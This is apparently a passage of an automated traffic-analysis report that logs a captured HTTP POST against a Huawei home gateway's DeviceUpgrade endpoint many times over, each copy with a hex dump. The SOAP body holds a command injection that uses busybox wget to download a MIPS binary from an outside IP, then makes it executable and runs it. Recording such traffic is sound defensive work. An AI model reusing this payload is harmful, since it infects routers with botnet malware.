s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 